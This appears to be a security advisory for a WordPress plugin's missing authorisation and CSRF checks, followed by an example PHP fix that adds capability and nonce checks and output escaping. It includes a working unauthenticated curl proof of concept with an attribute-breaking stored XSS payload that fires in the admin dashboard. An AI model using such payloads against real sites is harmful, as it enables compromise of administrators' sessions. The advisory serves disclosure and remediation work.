The plugin does not have authorisation and CSRF checks in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard.
curl -X POST --data 'qc_bot_str_weight=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' http://127.0.0.1/
The XSS will be triggered when an admin views the Simple Text response dashboard (/wp-admin/admin.php?page=simple-text-response).
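
One way to close both gaps described above, shown as an added example that is not the plugin's own code: the save handler gains a capability check and a nonce check, and the stored value is escaped where it is printed. The function names, the nonce action and field, storage under an option named `qc_bot_str_weight`, and rendering into an input's `value` attribute are assumptions; only the POST parameter name comes from the advisory.

```php
<?php
// Added example. str_save_settings, str_render_weight_field and the
// 'str_save_settings' / 'str_nonce' nonce names are hypothetical.

// admin_init still fires for unauthenticated requests to admin-ajax.php and
// admin-post.php, so moving the hook is not enough: the checks below are
// what enforce access control.
add_action( 'admin_init', 'str_save_settings' );

function str_save_settings() {
    if ( ! isset( $_POST['qc_bot_str_weight'] ) ) {
        return; // Not a settings submission.
    }

    // Authorisation: only users who may manage site options can save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', '', array( 'response' => 403 ) );
    }

    // CSRF: verify the nonce emitted by the settings form; dies on failure.
    check_admin_referer( 'str_save_settings', 'str_nonce' );

    // Sanitise on input. This strips tags but keeps quote characters, so it
    // does not by itself stop an attribute-breaking value; output escaping
    // below is still required.
    $weight = sanitize_text_field( wp_unslash( $_POST['qc_bot_str_weight'] ) );
    update_option( 'qc_bot_str_weight', $weight );
}

// Called while rendering the settings form (assumed to be an <input> field).
function str_render_weight_field() {
    $weight = get_option( 'qc_bot_str_weight', '' );

    // Emit the nonce field that check_admin_referer() verifies on save.
    wp_nonce_field( 'str_save_settings', 'str_nonce' );

    // Escape for the attribute context: a double quote in the stored value
    // is encoded and cannot close the value attribute.
    printf(
        '<input type="text" name="qc_bot_str_weight" value="%s" />',
        esc_attr( $weight )
    );
}
```

Values saved before such a fix remain in the database, so output escaping is what neutralises anything already stored.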